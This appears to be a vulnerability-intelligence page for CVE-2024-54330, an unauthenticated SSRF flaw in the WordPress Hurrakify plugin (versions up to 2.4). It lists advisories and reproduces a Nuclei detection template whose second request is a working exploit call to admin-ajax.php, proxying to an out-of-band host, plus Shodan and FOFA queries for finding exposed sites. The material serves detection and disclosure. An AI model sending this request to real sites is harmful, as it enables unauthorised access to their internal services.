Hurrakify plugin <= 2.4 is vulnerable to Server-Side Request Forgery allowing unauthorized web requests.
Reporter | Title | Published | Views | Family All 6 |
---|---|---|---|---|
Vulnrichment | CVE-2024-54330 WordPress Hurrakify plugin <= 2.4 - Server Side Request Forgery (SSRF) vulnerability | 13 Dec 202414:25 | – | vulnrichment |
CVE | CVE-2024-54330 | 13 Dec 202415:15 | – | cve |
NVD | CVE-2024-54330 | 13 Dec 202415:15 | – | nvd |
Cvelist | CVE-2024-54330 WordPress Hurrakify plugin <= 2.4 - Server Side Request Forgery (SSRF) vulnerability | 13 Dec 202414:25 | – | cvelist |
0day.today | WordPress Hurrakify 2.4 Server-Side Request Forgery Vulnerability | 2 Jan 202500:00 | – | zdt |
Wordfence Blog | Wordfence Intelligence Weekly WordPress Vulnerability Report (December 9, 2024 to December 15, 2024) | 19 Dec 202417:13 | – | wordfence |
id: CVE-2024-54330
info:
name: Hurrakify <= 2.4 - Server-Side Request Forgery
author: s4e-io
severity: high
description: |
The Hurrakify plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.4. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application which can be used to query and modify information from internal services.
reference:
- https://github.com/RandomRobbieBF/CVE-2024-54330
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hurrakify/hurrakify-24-unauthenticated-server-side-request-forgery
- https://nvd.nist.gov/vuln/detail/CVE-2024-54330
- https://patchstack.com/database/wordpress/plugin/hurrakify/vulnerability/wordpress-hurrakify-plugin-2-4-server-side-request-forgery-ssrf-vulnerability?_s_id=cve
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cve-id: CVE-2024-54330
cwe-id: CWE-918
epss-score: 0.00043
epss-percentile: 0.11007
metadata:
verified: true
max-request: 2
vendor: by_hep_hep_hurra
product: hurrakify
framework: wordpress
fofa-query: body="wp-content/plugins/hurrakify"
shodan-query: http.html:"wp-content/plugins/hurrakify"
tags: cve,cve2024,wordpress,wp-plugin,hurrakify,ssrf,oob,oast
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "/wp-content/plugins/hurrakify")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
GET /wp-admin/admin-ajax.php?action=hurraki_tooltip_proxy&target=http://{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- 'http'
- type: word
part: content_type
words:
- 'text/html'
- type: status
status:
- 200
# digest: 490a0046304402204a75d746ec201b3541fec46e6225fe1851cf28df86895c7cce5d4eb11fa006ef02202311909603de289d9a1ec35a4cd50b58318b1109adf27511d355454cbf249fb2:922c64590222798bb761d5b6d8e72950
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo